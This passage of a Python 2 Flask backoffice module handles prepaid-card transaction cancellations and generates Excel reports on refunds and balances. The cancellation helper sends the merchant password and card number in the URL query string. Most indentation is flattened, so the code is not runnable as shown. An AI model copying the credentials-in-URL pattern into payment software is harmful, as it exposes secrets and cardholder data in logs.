excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
            #add the success message
print "성공"
'''
Transaction cancellation API for payments and top-ups
'''
@cardApi.route("/api/card/cancelCardDeal", methods=['POST'])
def cancelCardDeal():
data = request.json
cardData = {
"onlineId" : paramEscape(getParameter(data,"merchantId")), #온라인아이디
"onlinePwd" : paramEscape(getParameter(data,"merchantPwd")), #온라인아이디 비밀번호
"approvalNo" : paramEscape(getParameter(data,"approvalNo")), #승인번호
"approvalDate" : paramEscape(getParameter(data,"approvalDate")), #승인시간
"cardNo" : paramEscape(getParameter(data,"cardNo")), #카드번호
"orderNo" : paramEscape(getParameter(data,"orderNo")), #거래번호
"transactionCode" : paramEscape(getParameter(data,"transactionCode")), #거래코드(결제취소:PC, 충전취소:CC)
"amount" : paramEscape(getParameter(data,"amount")), #거래금액
"requestDate" : datetime.now().strftime('%Y%m%d%H%M%S'), #요청일자
"cancelType" : paramEscape(getParameter(data,"cancelType")), #취소타입(D1: 전체취소) 해당 API는 전체취소
"cancelMemo" : paramEscape(getParameter(data,"cancelMemo")), #취소사유
"branchCode" : paramEscape(getParameter(data,"posCode")) #점포코드
}
return json.dumps(cancelCardDealApi("/CardService/admin/v1/card/transaction", {}, cardData))
'''
Internal cardService API call for cancelling payments and top-ups
'''
def cancelCardDealApi(apiUrl ,data , queryData):
readData = {
"status" : "",
"message" : "",
}
try :
url = apiUrl
if (len(queryData) > 0) :
url = url + "?" + urlencode(queryData)
conn = httplib.HTTPConnection(getServerUrl(API_SERVER_KPC_LEGACY), timeout=120)
print(url)
conn.request('POST', url, json.dumps(data), headers={"Content-Type" : "application/json; charset=utf-8"})
response = conn.getresponse()
readResponseData = response.read()
print(readResponseData)
readData = json.loads(readResponseData)
except HTTPError as err:
readData["status"] = err.code
errorMsg = "오류가 발생하였습니다.\n해당 메시지를 스크린 캡쳐하여 담당자에 문의 바랍니다.\n" + err.read()
readData["message"] = errorMsg
return readData
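# Note on cancelCardDealApi: the cancel fields supplied by the route above are
# passed in as queryData and therefore travel urlencoded in the URL query
# string, while the JSON request body carries the (empty) data dict.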
@cardApi.route("/api/card/restrictHistory", methods=["GET"])
def getCardRestirctHistory():
queryData = {
'giftNo': getParameter({},"giftNo"),
'start': getParameter({},"start"),
'length': getParameter({},"length")
}
return json.dumps(getApiData("/admin/v1/card/restrict", queryData, API_SERVER_KPC_LEGACY))
def cardRefundExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'잔액환불 내역_'+ queryData['startDate'] + '~' + queryData['endDate'] +'.zip'
        #add the job-start message
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드 잔액환불정보 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '잔액환불 내역_' + queryData['startDate'] + '~' + queryData['endDate'] + '_' + str(fileCnt) + '.xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"번호")
worksheet.write(row, 1 ,"카드번호")
worksheet.write(row, 2 ,"진행상태")
worksheet.write(row, 3 ,"고객명")
worksheet.write(row, 4 ,"접수일")
worksheet.write(row, 5 ,"승인일")
worksheet.write(row, 6 ,"환불일")
worksheet.write(row, 7 ,"접수시 잔액")
worksheet.write(row, 8 ,"환불 수수료")
worksheet.write(row, 9 ,"실환불금액")
worksheet.write(row, 10 ,"환불은행")
worksheet.write(row, 11 ,"환불계좌")
worksheet.write(row, 12 ,"예금주")
while True :
result_data = getApiData("/card/approveCardBalnaceRefunds" ,queryData , API_SERVER_BACKOFFICE)
for data in result_data["data"]:
row += 1
receptionDt = data["receptionDt"];
approvalDt = data["approvalDt"];
refundDt = data["refundDt"];
if receptionDt != None :
receptionDt = datetime.fromtimestamp(data["receptionDt"] / 1e3)
receptionDt = receptionDt.strftime('%Y-%m-%d')
if data["approvalDt"] != None :
approvalDt = datetime.fromtimestamp(data["approvalDt"] / 1e3)
approvalDt = approvalDt.strftime('%Y-%m-%d')
if data["refundDt"] != None :
refundDt = datetime.fromtimestamp(data["refundDt"] / 1e3)
refundDt = refundDt.strftime('%Y-%m-%d')
else :
refundDt = '-'
worksheet.write(row, 0 ,row)
worksheet.write(row, 1 ,data["cardNumber"])
worksheet.write(row, 2 ,'환불'+data["statusName"])
worksheet.write(row, 3 ,data["customerName"])
worksheet.write(row, 4 ,receptionDt)
worksheet.write(row, 5 ,approvalDt)
worksheet.write(row, 6 ,refundDt)
worksheet.write(row, 7 ,long(data["balance"]), money_format)
worksheet.write(row, 8 ,long(data["refundCommision"]), money_format)
worksheet.write(row, 9 ,long(data["balance"])-long(data["refundCommision"]), money_format)
worksheet.write(row, 10 ,data["bankName"])
worksheet.write(row, 11 ,data["bankAccNo"])
worksheet.write(row, 12 ,data["bankHolder"])
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '잔액환불 내역_' + queryData['startDate'] + '~' + queryData['endDate'] + '_' + str(fileCnt) + '.xlsx'
                    # recreate the file once (DB fetch count * 2) rows have been written
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호")
worksheet.write(row, 1 ,"카드번호")
worksheet.write(row, 2 ,"진행상태")
worksheet.write(row, 3 ,"고객명")
worksheet.write(row, 4 ,"접수일")
worksheet.write(row, 5 ,"승인일")
worksheet.write(row, 6 ,"환불일")
worksheet.write(row, 7 ,"접수시 잔액")
worksheet.write(row, 8 ,"환불 수수료")
worksheet.write(row, 9 ,"실환불금액")
worksheet.write(row, 10 ,"환불은행")
worksheet.write(row, 11 ,"환불계좌")
worksheet.write(row, 12 ,"예금주")
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(result_data["data"]) < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
        #add the error message
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
            #add the success message
print "성공"
#request the card balance-by-period list
@cardApi.route("/api/card/balance/daily-balance-list", methods=['GET'])
def cardDailyBalanceList():
formData = json.loads(request.args.get("formData"))
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'limit' : setStringToNumber(getParameter({},"length")),
'offset' : setStringToNumber(getParameter({},"start")),
'orderBy' : getParameter(formData, "orderBy")
}
result_data = getApiData("/balance/daily-balance-list" , queryData ,API_SERVER_BACKOFFICE)
return json.dumps(result_data)
#request an Excel download of the card balance-by-period list
@cardApi.route("/api/card/balance/daily-balance-list/excelAll", methods=['GET'])
def cardDailyBalanceListExcelAll():
formData = {}
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'offset' : 0,
'orderBy' : getParameter(formData, "orderBy"),
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardDailyBalanceListExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
#build the Excel file for the card balance-by-period list
def cardDailyBalanceListExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드_기간별_잔액관리'+ datetime.now().strftime('%Y%m%d') +'.zip'
        #add the job-start message
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드 기간별 잔액관리 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드_기간별_잔액관리(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
title_format = workbook.add_format({'align':'center', 'valign':'vcenter', 'bold':True, 'border':1,'fg_color':'#A9D0F5'})
string_format = workbook.add_format({'align':'center', 'valign':'vcenter'})
summary_money_format = workbook.add_format({'fg_color' : '#E5E5E5'});
summary_money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"일자", title_format)
worksheet.write(row, 2 ,"이월잔액", title_format)
worksheet.write(row, 3 ,"충전", title_format)
worksheet.write(row, 4 ,"충전취소", title_format)
worksheet.write(row, 5 ,"충전합계", title_format)
worksheet.write(row, 6 ,"결제", title_format)
worksheet.write(row, 7 ,"결제취소", title_format)
worksheet.write(row, 8 ,"결제합계", title_format)
worksheet.write(row, 9 ,"환불", title_format)
worksheet.write(row, 10 ,"잔액", title_format)
while True :
searchData = getApiData("/balance/daily-balance-list" , queryData ,API_SERVER_BACKOFFICE)
summaryData = searchData["totalData"]
for data in searchData["data"]:
row += 1
worksheet.write(row, 0 ,row, string_format)
worksheet.write(row, 1 ,data["balanceDate"], money_format)
worksheet.write(row, 2 ,data["prevBalance"], money_format)
worksheet.write(row, 3 ,data["chargeAmount"], money_format)
worksheet.write(row, 4 ,data["cancelChargeAmount"], money_format)
worksheet.write(row, 5 ,data["chargeSum"], money_format)
worksheet.write(row, 6 ,data["payAmount"], money_format)
worksheet.write(row, 7 ,data["cancelPayAmount"], money_format)
worksheet.write(row, 8 ,data["paySum"], money_format)
worksheet.write(row, 9 ,data["refundAmount"], money_format)
worksheet.write(row, 10 ,data["balance"], money_format)
# worksheet.write(row, 7 ,parseDate(data["expireDt"] ,'%Y-%m-%d %H:%M:%S.0','%Y-%m-%d'), string_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_잔액관리(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
                    # recreate the file once (DB fetch count * 2) rows have been written
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"일자", title_format)
worksheet.write(row, 2 ,"이월잔액", title_format)
worksheet.write(row, 3 ,"충전", title_format)
worksheet.write(row, 4 ,"충전취소", title_format)
worksheet.write(row, 5 ,"충전합계", title_format)
worksheet.write(row, 6 ,"결제", title_format)
worksheet.write(row, 7 ,"결제취소", title_format)
worksheet.write(row, 8 ,"결제합계", title_format)
worksheet.write(row, 9 ,"환불", title_format)
worksheet.write(row, 10 ,"잔액", title_format)
row += 1
worksheet.write(row, 0 ,"", summary_money_format)
worksheet.write(row, 1 ,"", summary_money_format)
worksheet.write(row, 2 ,summaryData["prevBalance"], summary_money_format)
worksheet.write(row, 3 ,summaryData["chargeAmount"], summary_money_format)
worksheet.write(row, 4 ,summaryData["cancelChargeAmount"], summary_money_format)
worksheet.write(row, 5 ,summaryData["chargeSum"], summary_money_format)
worksheet.write(row, 6 ,summaryData["payAmount"], summary_money_format)
worksheet.write(row, 7 ,summaryData["cancelPayAmount"], summary_money_format)
worksheet.write(row, 8 ,summaryData["paySum"], summary_money_format)
worksheet.write(row, 9 ,summaryData["refundAmount"], summary_money_format)
worksheet.write(row, 10 ,summaryData["balance"], summary_money_format)
# worksheet.write(row, 7 ,parseDate(data["expireDt"] ,'%Y-%m-%d %H:%M:%S.0','%Y-%m-%d'), string_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_잔액관리(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
                # recreate the file once (DB fetch count * 2) rows have been written
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"일자", title_format)
worksheet.write(row, 2 ,"이월잔액", title_format)
worksheet.write(row, 3 ,"충전", title_format)
worksheet.write(row, 4 ,"충전취소", title_format)
worksheet.write(row, 5 ,"충전합계", title_format)
worksheet.write(row, 6 ,"결제", title_format)
worksheet.write(row, 7 ,"결제취소", title_format)
worksheet.write(row, 8 ,"결제합계", title_format)
worksheet.write(row, 9 ,"환불", title_format)
worksheet.write(row, 10 ,"잔액", title_format)
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(searchData["data"])+1 < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
        #add the error message
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
            #add the success message
print "성공"
#request the per-transaction summary list for the card balance-by-period view
#(top-up: TRNT-0001, payment: TRNT-0002, refund: TRNT-0003)
@cardApi.route("/api/card/balance/transaction-summary", methods=['GET'])
def cardDailyBalanceTransactionSummary():
formData = json.loads(request.args.get("formData"))
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
transactionType = request.args.get("transactionType")
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'transactionType': transactionType,
'limit' : setStringToNumber(getParameter({},"length")),
'offset' : setStringToNumber(getParameter({},"start")),
}
result_data = getApiData("/balance/transaction-summary" , queryData ,API_SERVER_BACKOFFICE)
return json.dumps(result_data)
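# Illustrative sketch (not part of the original module): how a client might call the
# transaction-summary endpoint above. The host below and the example date range are
# assumptions; in the real deployment the base URL and session cookie come from the
# backoffice login, so this helper is for reference only and is never invoked here.
def _example_transaction_summary_request():
    import json
    import urllib
    import urllib2
    form_data = json.dumps({"startDate": "2020-01-01 - 2020-01-31"})
    params = urllib.urlencode({
        "formData": form_data,
        "transactionType": "TRNT-0001",  # charge summary
        "length": "10",
        "start": "0",
    })
    # Hypothetical host; replace with the actual backoffice address.
    response = urllib2.urlopen("http://localhost:5000/api/card/balance/transaction-summary?" + params)
    return json.loads(response.read())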
# Card balance-by-period management: transaction summary list Excel download request
# Charge total: TRNT-0001 (charge)
@cardApi.route("/api/card/balance/transaction-summary/cargeSum/excelAll", methods=['GET'])
def cardDailyBalanceTransactionSummaryCargeSumExcelAll():
formData = {}
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'transactionType': "TRNT-0001",
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'offset' : 0,
'orderBy' : getParameter(formData, "orderBy"),
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardChargeSumListExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
# Card balance-by-period management: transaction summary list Excel download worker
# Charge total: TRNT-0001 (charge)
def cardChargeSumListExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드_기간별_충전합계'+ datetime.now().strftime('%Y%m%d') +'.zip'
# Record the job start message
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드 기간별 충전합계 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드_기간별_충전합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
title_format = workbook.add_format({'align':'center', 'valign':'vcenter', 'bold':True, 'border':1,'fg_color':'#A9D0F5'})
string_format = workbook.add_format({'align':'center', 'valign':'vcenter'})
summary_money_format = workbook.add_format({'fg_color' : '#E5E5E5'})
summary_money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"충전", title_format)
worksheet.write(row, 3 ,"충전취소", title_format)
worksheet.write(row, 4 ,"충전합계", title_format)
while True :
searchData = getApiData("/balance/transaction-summary" , queryData ,API_SERVER_BACKOFFICE)
summaryData = searchData["totalData"]
for data in searchData["data"]:
row += 1
worksheet.write(row, 0 ,row, string_format)
worksheet.write(row, 1 ,data["merchantName"]+" - "+data["serviceName"], string_format)
worksheet.write(row, 2 ,data["transactionAmount"], money_format)
worksheet.write(row, 3 ,data["cancelTransactionAmount"], money_format)
worksheet.write(row, 4 ,data["transactionSum"], money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_충전합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ')_' + str(fileCnt) + '.xlsx'
# Recreate the file when (DB fetch count * 2) rows have been written; the fileCnt suffix keeps earlier files from being overwritten
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"충전", title_format)
worksheet.write(row, 3 ,"충전취소", title_format)
worksheet.write(row, 4 ,"충전합계", title_format)
row += 1
worksheet.write(row, 0 ,"", summary_money_format)
worksheet.write(row, 1 ,"", summary_money_format)
worksheet.write(row, 2 ,summaryData["transactionAmount"], summary_money_format)
worksheet.write(row, 3 ,summaryData["cancelTransactionAmount"], summary_money_format)
worksheet.write(row, 4 ,summaryData["transactionSum"], summary_money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_충전합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ')_' + str(fileCnt) + '.xlsx'
# Recreate the file when (DB fetch count * 2) rows have been written; the fileCnt suffix keeps earlier files from being overwritten
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"충전", title_format)
worksheet.write(row, 3 ,"충전취소", title_format)
worksheet.write(row, 4 ,"충전합계", title_format)
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(searchData["data"])+1 < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
# Record the error message
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
# Record the success message
print "성공"
# Card balance-by-period management: transaction summary list Excel download request
# Payment total: TRNT-0002 (payment)
@cardApi.route("/api/card/balance/transaction-summary/paySum/excelAll", methods=['GET'])
def cardDailyBalanceTransactionSummaryPaySumExcelAll():
formData = {}
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'transactionType': "TRNT-0002",
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'offset' : 0,
'orderBy' : getParameter(formData, "orderBy"),
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardPaySumListExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
# Card balance-by-period management: transaction summary list Excel download worker
# Payment total: TRNT-0002 (payment)
def cardPaySumListExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드_기간별_결제합계'+ datetime.now().strftime('%Y%m%d') +'.zip'
# Record the job start message
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드 기간별 결제합계 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드_기간별_결제합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
title_format = workbook.add_format({'align':'center', 'valign':'vcenter', 'bold':True, 'border':1,'fg_color':'#A9D0F5'})
string_format = workbook.add_format({'align':'center', 'valign':'vcenter'})
summary_money_format = workbook.add_format({'fg_color' : '#E5E5E5'})
summary_money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"결제", title_format)
worksheet.write(row, 3 ,"결제취소", title_format)
worksheet.write(row, 4 ,"결제합계", title_format)
while True :
searchData = getApiData("/balance/transaction-summary" , queryData ,API_SERVER_BACKOFFICE)
summaryData = searchData["totalData"]
for data in searchData["data"]:
row += 1
worksheet.write(row, 0 ,row, string_format)
worksheet.write(row, 1 ,data["merchantName"]+" - "+data["serviceName"], string_format)
worksheet.write(row, 2 ,data["transactionAmount"], money_format)
worksheet.write(row, 3 ,data["cancelTransactionAmount"], money_format)
worksheet.write(row, 4 ,data["transactionSum"], money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_결제합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ')_' + str(fileCnt) + '.xlsx'
# Recreate the file when (DB fetch count * 2) rows have been written; the fileCnt suffix keeps earlier files from being overwritten
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"결제", title_format)
worksheet.write(row, 3 ,"결제취소", title_format)
worksheet.write(row, 4 ,"결제합계", title_format)
row += 1
worksheet.write(row, 0 ,"", summary_money_format)
worksheet.write(row, 1 ,"", summary_money_format)
worksheet.write(row, 2 ,summaryData["transactionAmount"], summary_money_format)
worksheet.write(row, 3 ,summaryData["cancelTransactionAmount"], summary_money_format)
worksheet.write(row, 4 ,summaryData["transactionSum"], summary_money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_결제합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ')_' + str(fileCnt) + '.xlsx'
# Recreate the file when (DB fetch count * 2) rows have been written; the fileCnt suffix keeps earlier files from being overwritten
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"결제", title_format)
worksheet.write(row, 3 ,"결제취소", title_format)
worksheet.write(row, 4 ,"결제합계", title_format)
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(searchData["data"])+1 < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
# Record the error message
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
# Record the success message
print "성공"
# Card balance-by-period management: transaction summary list Excel download request
# Refund total: TRNT-0003 (refund)
@cardApi.route("/api/card/balance/transaction-summary/refundSum/excelAll", methods=['GET'])
def cardDailyBalanceTransactionSummaryRefundSumExcelAll():
formData = {}
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'transactionType': "TRNT-0003",
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'offset' : 0,
'orderBy' : getParameter(formData, "orderBy"),
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardRefundAmountListExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
# Card balance-by-period management: transaction summary list Excel download worker
# Refund total: TRNT-0003 (refund)
def cardRefundAmountListExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드_기간별_환불합계'+ datetime.now().strftime('%Y%m%d') +'.zip'
# Record the job start message
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드 기간별 환불합계 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드_기간별_환불합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
title_format = workbook.add_format({'align':'center', 'valign':'vcenter', 'bold':True, 'border':1,'fg_color':'#A9D0F5'})
string_format = workbook.add_format({'align':'center', 'valign':'vcenter'})
summary_money_format = workbook.add_format({'fg_color' : '#E5E5E5'})
summary_money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"환불금액", title_format)
while True :
searchData = getApiData("/balance/transaction-summary" , queryData ,API_SERVER_BACKOFFICE)
summaryData = searchData["totalData"]
for data in searchData["data"]:
row += 1
worksheet.write(row, 0 ,row, string_format)
worksheet.write(row, 1 ,data["merchantName"]+" - "+data["serviceName"], string_format)
